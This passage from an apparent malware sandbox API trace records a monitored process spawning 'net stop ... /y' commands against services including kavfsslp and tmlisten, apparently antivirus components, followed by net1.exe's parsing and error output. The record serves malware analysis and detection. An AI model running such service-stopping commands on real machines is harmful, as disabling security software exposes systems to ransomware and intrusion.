LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x876218 [0204.656] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Net.Msmq Listener Adapter service is not started.\r\n", cchWideChar=55, lpMultiByteStr=0x876218, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Net.Msmq Listener Adapter service is not started.\r\n", lpUsedDefaultChar=0x0) returned 55 [0204.656] WriteFile (in: hFile=0x26c, lpBuffer=0x876218, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1dfb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb14, lpOverlapped=0x0) returned 0 [0204.656] LocalFree (hMem=0x876218) returned 0x0 [0204.656] GetFileType (hFile=0x26c) returned 0x3 [0204.656] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x876218 [0204.656] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x876218, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x87", lpUsedDefaultChar=0x0) returned 2 [0204.656] WriteFile (in: hFile=0x26c, lpBuffer=0x876218, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb14, lpOverlapped=0x0) returned 0 [0204.656] LocalFree (hMem=0x876218) returned 0x0 [0204.657] _ultow (in: _Dest=0xdc1, _Radix=1964868 | out: _Dest=0xdc1) returned="3521" [0204.657] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x68b338, nSize=0x800, Arguments=0x689dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0204.657] GetFileType (hFile=0x26c) returned 0x3 [0204.657] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x876218 [0204.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x876218, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n.\r\n", lpUsedDefaultChar=0x0) returned 52 [0204.657] WriteFile (in: hFile=0x26c, lpBuffer=0x876218, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1dfb20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb20, lpOverlapped=0x0) returned 0 [0204.657] LocalFree (hMem=0x876218) returned 0x0 [0204.657] GetFileType (hFile=0x26c) returned 0x3 [0204.657] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x876218 [0204.657] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x876218, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x87", lpUsedDefaultChar=0x0) returned 2 [0204.657] WriteFile (in: hFile=0x26c, lpBuffer=0x876218, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfb20, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb20, lpOverlapped=0x0) returned 0 [0204.657] LocalFree (hMem=0x876218) returned 0x0 [0204.657] NetApiBufferFree (Buffer=0x871c78) returned 0x0 [0204.658] NetApiBufferFree (Buffer=0x871c90) returned 0x0 [0204.658] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop NetMsmqActivator /y" [0204.658] exit (_Code=2) Process: id = "218" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x226e5000" os_pid = "0x508" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 391 os_tid = 0x74c Process: id = "219" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x69bce000" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "218" os_parent_pid = "0x508" cmd_line = "C:\\Windows\\system32\\net1 stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 392 os_tid = 0xbc4 [0204.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bf8a4 | out: lpSystemTimeAsFileTime=0x2bf8a4*(dwLowDateTime=0x4343ad20, dwHighDateTime=0x1d57a87)) [0204.804] GetCurrentProcessId () returned 0xbe0 [0204.804] GetCurrentThreadId () returned 0xbc4 [0204.804] GetTickCount () returned 0x116cd1f [0204.804] QueryPerformanceCounter (in: lpPerformanceCount=0x2bf89c | out: lpPerformanceCount=0x2bf89c*=32508846214) returned 1 [0204.804] GetModuleHandleA (lpModuleName=0x0) returned 0x710000 [0204.804] __set_app_type (_Type=0x1) [0204.804] __p__fmode () returned 0x74eb31f4 [0204.804] __p__commode () returned 0x74eb31fc [0204.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x71ffe6) returned 0x0 [0204.805] __getmainargs (in: _Argc=0x729064, _Argv=0x72906c, _Env=0x729068, _DoWildCard=0, _StartInfo=0x729024 | out: _Argc=0x729064, _Argv=0x72906c, _Env=0x729068) returned 0 [0204.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.805] GetConsoleOutputCP () returned 0x1b5 [0204.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x729080 | out: lpCPInfo=0x729080) returned 1 [0204.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.808] sprintf_s (in: _DstBuf=0x2bf85c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.808] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.810] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0204.810] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf628, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.810] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x64) returned 0x913c00 [0204.810] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.810] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf82c | out: Buffer=0x2bf82c*=0x911c60) returned 0x0 [0204.810] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bf82c | out: Buffer=0x2bf82c*=0x911c78) returned 0x0 [0204.810] _fileno (_File=0x74eb2900) returned -2 [0204.810] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.811] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.811] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.811] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.811] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.811] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.811] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.811] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.811] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.811] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.811] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.811] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.811] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.811] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.811] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.811] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.811] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.811] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.811] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.811] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.811] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.811] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.811] _wcsicmp (_String1="accounts", _String2="kavfsslp") returned -10 [0204.811] _wcsicmp (_String1="computer", _String2="kavfsslp") returned -8 [0204.811] _wcsicmp (_String1="config", _String2="kavfsslp") returned -8 [0204.811] _wcsicmp (_String1="continue", _String2="kavfsslp") returned -8 [0204.811] _wcsicmp (_String1="cont", _String2="kavfsslp") returned -8 [0204.811] _wcsicmp (_String1="file", _String2="kavfsslp") returned -5 [0204.811] _wcsicmp (_String1="files", _String2="kavfsslp") returned -5 [0204.811] _wcsicmp (_String1="group", _String2="kavfsslp") returned -4 [0204.811] _wcsicmp (_String1="groups", _String2="kavfsslp") returned -4 [0204.811] _wcsicmp (_String1="help", _String2="kavfsslp") returned -3 [0204.811] _wcsicmp (_String1="helpmsg", _String2="kavfsslp") returned -3 [0204.811] _wcsicmp (_String1="localgroup", _String2="kavfsslp") returned 1 [0204.811] _wcsicmp (_String1="pause", _String2="kavfsslp") returned 5 [0204.811] _wcsicmp (_String1="session", _String2="kavfsslp") returned 8 [0204.811] _wcsicmp (_String1="sessions", _String2="kavfsslp") returned 8 [0204.811] _wcsicmp (_String1="sess", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="share", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="start", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="stats", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="statistics", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="stop", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="time", _String2="kavfsslp") returned 9 [0204.812] _wcsicmp (_String1="user", _String2="kavfsslp") returned 10 [0204.812] _wcsicmp (_String1="users", _String2="kavfsslp") returned 10 [0204.812] _wcsicmp (_String1="msg", _String2="kavfsslp") returned 2 [0204.812] _wcsicmp (_String1="messenger", _String2="kavfsslp") returned 2 [0204.812] _wcsicmp (_String1="receiver", _String2="kavfsslp") returned 7 [0204.812] _wcsicmp (_String1="rcv", _String2="kavfsslp") returned 7 [0204.812] _wcsicmp (_String1="netpopup", _String2="kavfsslp") returned 3 [0204.812] _wcsicmp (_String1="redirector", _String2="kavfsslp") returned 7 [0204.812] _wcsicmp (_String1="redir", _String2="kavfsslp") returned 7 [0204.812] _wcsicmp (_String1="rdr", _String2="kavfsslp") returned 7 [0204.812] _wcsicmp (_String1="workstation", _String2="kavfsslp") returned 12 [0204.812] _wcsicmp (_String1="work", _String2="kavfsslp") returned 12 [0204.812] _wcsicmp (_String1="wksta", _String2="kavfsslp") returned 12 [0204.812] _wcsicmp (_String1="prdr", _String2="kavfsslp") returned 5 [0204.812] _wcsicmp (_String1="devrdr", _String2="kavfsslp") returned -7 [0204.812] _wcsicmp (_String1="lanmanworkstation", _String2="kavfsslp") returned 1 [0204.812] _wcsicmp (_String1="server", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="svr", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="srv", _String2="kavfsslp") returned 8 [0204.812] _wcsicmp (_String1="lanmanserver", _String2="kavfsslp") returned 1 [0204.812] _wcsicmp (_String1="alerter", _String2="kavfsslp") returned -10 [0204.812] _wcsicmp (_String1="netlogon", _String2="kavfsslp") returned 3 [0204.812] _wcsupr (in: _String="kavfsslp" | out: _String="KAVFSSLP") returned="KAVFSSLP" [0204.812] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x9154b8 [0204.815] GetServiceKeyNameW (in: hSCManager=0x9154b8, lpDisplayName="KAVFSSLP", lpServiceName=0x72aaf0, lpcchBuffer=0x2bf7c8 | out: lpServiceName="", lpcchBuffer=0x2bf7c8) returned 0 [0204.816] _wcsicmp (_String1="msg", _String2="KAVFSSLP") returned 2 [0204.816] _wcsicmp (_String1="messenger", _String2="KAVFSSLP") returned 2 [0204.816] _wcsicmp (_String1="receiver", _String2="KAVFSSLP") returned 7 [0204.816] _wcsicmp (_String1="rcv", _String2="KAVFSSLP") returned 7 [0204.816] _wcsicmp (_String1="redirector", _String2="KAVFSSLP") returned 7 [0204.816] _wcsicmp (_String1="redir", _String2="KAVFSSLP") returned 7 [0204.816] _wcsicmp (_String1="rdr", _String2="KAVFSSLP") returned 7 [0204.816] _wcsicmp (_String1="workstation", _String2="KAVFSSLP") returned 12 [0204.816] _wcsicmp (_String1="work", _String2="KAVFSSLP") returned 12 [0204.816] _wcsicmp (_String1="wksta", _String2="KAVFSSLP") returned 12 [0204.816] _wcsicmp (_String1="prdr", _String2="KAVFSSLP") returned 5 [0204.816] _wcsicmp (_String1="devrdr", _String2="KAVFSSLP") returned -7 [0204.816] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFSSLP") returned 1 [0204.816] _wcsicmp (_String1="server", _String2="KAVFSSLP") returned 8 [0204.816] _wcsicmp (_String1="svr", _String2="KAVFSSLP") returned 8 [0204.816] _wcsicmp (_String1="srv", _String2="KAVFSSLP") returned 8 [0204.816] _wcsicmp (_String1="lanmanserver", _String2="KAVFSSLP") returned 1 [0204.816] _wcsicmp (_String1="alerter", _String2="KAVFSSLP") returned -10 [0204.816] _wcsicmp (_String1="netlogon", _String2="KAVFSSLP") returned 3 [0204.816] NetServiceControl (in: servername=0x0, service="KAVFSSLP", opcode=0x0, arg=0x0, bufptr=0x2bf7c4 | out: bufptr=0x2bf7c4) returned 0x889 [0204.817] wcscpy_s (in: _Destination=0x72a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0204.817] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0204.818] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x72b338, nSize=0x800, Arguments=0x729dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0204.819] GetFileType (hFile=0x26c) returned 0x3 [0204.819] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x913fe8 [0204.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x913fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0204.819] WriteFile (in: hFile=0x26c, lpBuffer=0x913fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bf704, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf704, lpOverlapped=0x0) returned 0 [0204.819] LocalFree (hMem=0x913fe8) returned 0x0 [0204.819] GetFileType (hFile=0x26c) returned 0x3 [0204.819] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x916290 [0204.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x916290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x91", lpUsedDefaultChar=0x0) returned 2 [0204.819] WriteFile (in: hFile=0x26c, lpBuffer=0x916290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf704, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf704, lpOverlapped=0x0) returned 0 [0204.819] LocalFree (hMem=0x916290) returned 0x0 [0204.819] _ultow (in: _Dest=0x889, _Radix=2881332 | out: _Dest=0x889) returned="2185" [0204.819] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x72b338, nSize=0x800, Arguments=0x729dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0204.819] GetFileType (hFile=0x26c) returned 0x3 [0204.819] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x916290 [0204.819] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x916290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0204.819] WriteFile (in: hFile=0x26c, lpBuffer=0x916290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bf710, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf710, lpOverlapped=0x0) returned 0 [0204.819] LocalFree (hMem=0x916290) returned 0x0 [0204.819] GetFileType (hFile=0x26c) returned 0x3 [0204.819] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x916290 [0204.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x916290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x91", lpUsedDefaultChar=0x0) returned 2 [0204.820] WriteFile (in: hFile=0x26c, lpBuffer=0x916290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf710, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf710, lpOverlapped=0x0) returned 0 [0204.820] LocalFree (hMem=0x916290) returned 0x0 [0204.820] NetApiBufferFree (Buffer=0x911c60) returned 0x0 [0204.820] NetApiBufferFree (Buffer=0x911c78) returned 0x0 [0204.820] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0204.820] exit (_Code=2) Process: id = "220" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a9ea000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop tmlisten /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 393 os_tid = 0x648 Process: id = "221" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6a694000" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "220" os_parent_pid = "0xacc" cmd_line = "C:\\Windows\\system32\\net1 stop tmlisten /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 394 os_tid = 0x7a4 [0204.967] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35fbcc | out: lpSystemTimeAsFileTime=0x35fbcc*(dwLowDateTime=0x435b7ae0, dwHighDateTime=0x1d57a87)) [0204.967] GetCurrentProcessId () returned 0x848 [0204.967] GetCurrentThreadId () returned 0x7a4 [0204.967] GetTickCount () returned 0x116cdbb [0204.967] QueryPerformanceCounter (in: lpPerformanceCount=0x35fbc4 | out: lpPerformanceCount=0x35fbc4*=32525152231) returned 1 [0204.967] GetModuleHandleA (lpModuleName=0x0) returned 0x8d0000 [0204.967] __set_app_type (_Type=0x1) [0204.967] __p__fmode () returned 0x74eb31f4 [0204.967] __p__commode () returned 0x74eb31fc [0204.967] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x8dffe6) returned 0x0 [0204.968] __getmainargs (in: _Argc=0x8e9064, _Argv=0x8e906c, _Env=0x8e9068, _DoWildCard=0, _StartInfo=0x8e9024 | out: _Argc=0x8e9064, _Argv=0x8e906c, _Env=0x8e9068) returned 0 [0204.968] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.968] GetConsoleOutputCP () returned 0x1b5 [0204.968] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x8e9080 | out: lpCPInfo=0x8e9080) returned 1 [0204.968] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.971] sprintf_s (in: _DstBuf=0x35fb84, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0204.971] setlocale (category=0, locale=".437") returned="English_United States.437" [0204.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0204.973] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0204.973] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop tmlisten /y" [0204.973] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35f950, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0204.973] RtlAllocateHeap (HeapHandle=0x700000, Flags=0x0, Size=0x64) returned 0x713c00 [0204.973] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0204.973] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fb54 | out: Buffer=0x35fb54*=0x711c60) returned 0x0 [0204.973] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35fb54 | out: Buffer=0x35fb54*=0x711c78) returned 0x0 [0204.973] _fileno (_File=0x74eb2900) returned -2 [0204.974] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0204.974] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0204.974] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0204.974] _wcsicmp (_String1="config", _String2="stop") returned -16 [0204.974] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0204.974] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0204.974] _wcsicmp (_String1="file", _String2="stop") returned -13 [0204.974] _wcsicmp (_String1="files", _String2="stop") returned -13 [0204.974] _wcsicmp (_String1="group", _String2="stop") returned -12 [0204.974] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0204.974] _wcsicmp (_String1="help", _String2="stop") returned -11 [0204.974] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0204.974] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0204.974] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0204.974] _wcsicmp (_String1="session", _String2="stop") returned -15 [0204.974] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0204.974] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0204.974] _wcsicmp (_String1="share", _String2="stop") returned -12 [0204.974] _wcsicmp (_String1="start", _String2="stop") returned -14 [0204.974] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0204.974] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0204.974] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0204.974] _wcsicmp (_String1="accounts", _String2="tmlisten") returned -19 [0204.974] _wcsicmp (_String1="computer", _String2="tmlisten") returned -17 [0204.974] _wcsicmp (_String1="config", _String2="tmlisten") returned -17 [0204.974] _wcsicmp (_String1="continue", _String2="tmlisten") returned -17 [0204.974] _wcsicmp (_String1="cont", _String2="tmlisten") returned -17 [0204.974] _wcsicmp (_String1="file", _String2="tmlisten") returned -14 [0204.974] _wcsicmp (_String1="files", _String2="tmlisten") returned -14 [0204.974] _wcsicmp (_String1="group", _String2="tmlisten") returned -13 [0204.974] _wcsicmp (_String1="groups", _String2="tmlisten") returned -13 [0204.974] _wcsicmp (_String1="help", _String2="tmlisten") returned -12 [0204.974] _wcsicmp (_String1="helpmsg", _String2="tmlisten") returned -12 [0204.974] _wcsicmp (_String1="localgroup", _String2="tmlisten") returned -8 [0204.975] _wcsicmp (_String1="pause", _String2="tmlisten") returned -4 [0204.975] _wcsicmp (_String1="session", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="sessions", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="sess", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="share", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="start", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="stats", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="statistics", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="stop", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="time", _String2="tmlisten") returned -4 [0204.975] _wcsicmp (_String1="user", _String2="tmlisten") returned 1 [0204.975] _wcsicmp (_String1="users", _String2="tmlisten") returned 1 [0204.975] _wcsicmp (_String1="msg", _String2="tmlisten") returned -7 [0204.975] _wcsicmp (_String1="messenger", _String2="tmlisten") returned -7 [0204.975] _wcsicmp (_String1="receiver", _String2="tmlisten") returned -2 [0204.975] _wcsicmp (_String1="rcv", _String2="tmlisten") returned -2 [0204.975] _wcsicmp (_String1="netpopup", _String2="tmlisten") returned -6 [0204.975] _wcsicmp (_String1="redirector", _String2="tmlisten") returned -2 [0204.975] _wcsicmp (_String1="redir", _String2="tmlisten") returned -2 [0204.975] _wcsicmp (_String1="rdr", _String2="tmlisten") returned -2 [0204.975] _wcsicmp (_String1="workstation", _String2="tmlisten") returned 3 [0204.975] _wcsicmp (_String1="work", _String2="tmlisten") returned 3 [0204.975] _wcsicmp (_String1="wksta", _String2="tmlisten") returned 3 [0204.975] _wcsicmp (_String1="prdr", _String2="tmlisten") returned -4 [0204.975] _wcsicmp (_String1="devrdr", _String2="tmlisten") returned -16 [0204.975] _wcsicmp (_String1="lanmanworkstation", _String2="tmlisten") returned -8 [0204.975] _wcsicmp (_String1="server", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="svr", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="srv", _String2="tmlisten") returned -1 [0204.975] _wcsicmp (_String1="lanmanserver", _String2="tmlisten") returned -8 [0204.975] _wcsicmp (_String1="alerter", _String2="tmlisten") returned -19 [0204.975] _wcsicmp (_String1="netlogon", _String2="tmlisten") returned -6 [0204.975] _wcsupr (in: _String="tmlisten" | out: _String="TMLISTEN") returned="TMLISTEN" [0204.976] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7154b8 [0204.978] GetServiceKeyNameW (in: hSCManager=0x7154b8, lpDisplayName="TMLISTEN", lpServiceName=0x8eaaf0, lpcchBuffer=0x35faf0 | out: lpServiceName="", lpcchBuffer=0x35faf0) returned 0 [0204.978] _wcsicmp (_String1="msg", _String2="TMLISTEN") returned -7 [0204.978] _wcsicmp (_String1="messenger", _String2="TMLISTEN") returned -7 [0204.979] _wcsicmp (_String1="receiver", _String2="TMLISTEN") returned -2 [0204.979] _wcsicmp (_String1="rcv", _String2="TMLISTEN") returned -2 [0204.979] _wcsicmp (_String1="redirector", _String2="TMLISTEN") returned -2 [0204.979] _wcsicmp (_String1="redir", _String2="TMLISTEN") returned -2 [0204.979] _wcsicmp (_String1="rdr", _String2="TMLISTEN") returned -2 [0204.979] _wcsicmp (_String1="workstation", _String2="TMLISTEN") returned 3 [0204.979] _wcsicmp (_String1="work", _String2="TMLISTEN") returned 3 [0204.979] _wcsicmp (_String1="wksta", 